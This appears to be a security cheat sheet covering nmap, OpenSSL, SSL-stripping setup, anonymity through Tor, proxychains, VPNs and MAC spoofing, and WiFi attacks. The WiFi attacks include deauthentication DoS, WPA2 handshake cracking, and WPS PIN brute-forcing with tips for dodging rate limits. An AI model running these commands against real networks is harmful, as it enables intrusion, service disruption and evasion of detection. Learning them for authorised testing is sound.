This is the multi-page printable view of this section. Click here to print.
Security
- 1: nmap
- 2: OpenSSL
- 3: SSL Stripping
- 4: Staying Anonymous
- 5: WiFi
1 - nmap
nmap is a powerful tool for mapping networks (website).
Examples
nmap -p 22 -sV 10.20.21.0/24- Scan IP’s 10.20.21.0 - 10.20.21.255 on port 22
2 - OpenSSL
OpenSSL is a powerful CLI for working with certificates.
| Description | Command |
|---|---|
| Read cert | openssl x509 -in cert.pem -text |
| Create domain key | openssl genrsa -out <your-domain>.key <2048 or 4096> |
| Create a CSR | openssl req -new -sha256 -key <your-domain>.key -out <your-domain>.csr |
| Create a Self Signed Cert | `echo 01 |
3 - SSL Stripping
After we connect to a network we can see all traffic on it, which is not very useful because most important traffic is encrypted.
Install sslstrip and dsniff
echo 1 > /proc/sys/net/ipv4/ip_forward
Add rule - iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Verify Rule - iptables -t nat -L PREROUTING
Ensure redirect port is open - iptables -I INPUT 1 -P tcp --dport 8080
4 - Staying Anonymous
Proxy, VPN, tor
Note about location: You want to access the servers you are targetting from the same region as the typical user base to blend in
Commands below may work on other distributions but they assume you are on Kali Linux.
Tor
Shouldnt run as root (adduser newusername)
Download from https://wwww.torproject.org
Traffic goes through a variety of nodes, at each node another layer of encryption is added.
After making it through the inner nodes, the exit node makes the actual request.
Difficult/Impossible to track unless somebody controlled all inner nodes (exteremly unlikely).
Proxychains
Proxychains allows you to route traffic through a series of proxies.
Use dynamic_chain in most cases
Can be HTTP, SOCKS4, or SOCKS5
Always use SOCKS5
Add SOCKS5 127.0.0.1 9050 to the bottom of your /etc/proxychains.conf
Start tor - service tor start
Verify - service tor status
Verify anonyminity - proxychains firefox www.dnsleaktest.com (your IP should be in another country)
The more free proxies you use the slower things will be, select just a few free proxies with the highest uptime/reviews
VPN
Change DNS Provider from your ISP
OpenDNS is a good option.
Replace your prepend domain-name-servers ....; line with:prepend domain-name-servers IP1, IP2;, where IP1/2 are the OpenDNS IP’s.
Restart your network-manager: service network-manager restart
Verify changes: cat /etc/resolve.conf, the output should show nameserver IP1, nameserver IP2 as your first 2 lines.
Get & Use VPN
- Download free vpn from a site like VPN Book, note user/password.
- Unzip download.
- Make sure all browsers are closed. Navigate to unziped folder, run
openvpn vpnprefix-tcp443.ovpn, vpnprefix will vary based of the package you chose. - Use credentials to login to vpn.
- Wait for
Initialization Sequence Completemessage to come up. - Verfiy: Open a browser and go do DNS Leak Test, verify your location is not your actual location. Click Standart Test and make sure your ISP is not your actual ISP.
Mac Addresses
Mac address doesnt make it past the router.
Doesn’t really matter if you change it on a VM.
macchanger is a great esay to use tool.
Change mac address everytime you bootup:
- Open crontab config:
crontab -e - Add this line and save:
@reboot macchanger -r eth0
5 - WiFi
These notes are intended for Whitehat/Educational purposes only
Configure Machine
Use ifconfig to determine device name (assume wlan0 for cmds)ifconfig wlan0 down - take device downiwconfig wlan0 mode monitor - set monitor modeifconfig wlan0 up - bring device back up
airmon-ng check wlan0 - Make sure nothing is interfering with your device
Kill processes (kill network manager first)
Useful Commands
Remember to change your mac address (notes on this page).airodump-ng wlan0 - Show wireless access points and connected devicesairodump-ng -c CHANNEL --bssid MAC -w FILENAME DEVICE - lookat traffic on a specific deviceaireplay-ng -0 0 -a MAC DEVICE - DOS attack a wireless network
To crack WPA2
Force user(s) to disconnect using a DOS attack, then watch them recconect and capture the handshake.aircrack-ng -w WORDFILE CAPFILE -e ESSID - Try to crack capture file with word listcrunch MINLEN MAXLEN -t PATTERN | aircrack-ng -w -CAPFILE -e ESSID - Try to crack with pipe from crunch (this operation is happening locally against the file not live against the router)
To crack WPS
Use wash -i DEVICE to view available routers to attack without wps locked.
Use airodump-ng to confirm you have good enough range.
Use reaver to orchestrate your attack.
WPS uses either a 4 or 8 digit pin of consisting of only numbers, you should disable it on your router (usually enabled by default).
Many routers will disable pin access for some period of time after too many failed attempts (ratelimiting), you can adjust reaver to try less often to avoid tripping this failsafe.
That same falesafe makes it easy to perform DOS on networks that rely on WPS authentication. If the ratelimiting locks you out completely, you can DOS it hard enough to try and force a the administrator to reset their router.
DOS Attacks
Basically impossible to stop.
May need to set the channel of your wifi card iwconfig DEVICE channel CHANNEL
Then use aireplay-ng -0 0 -a MAC DEVICE, to DOS all connected machines.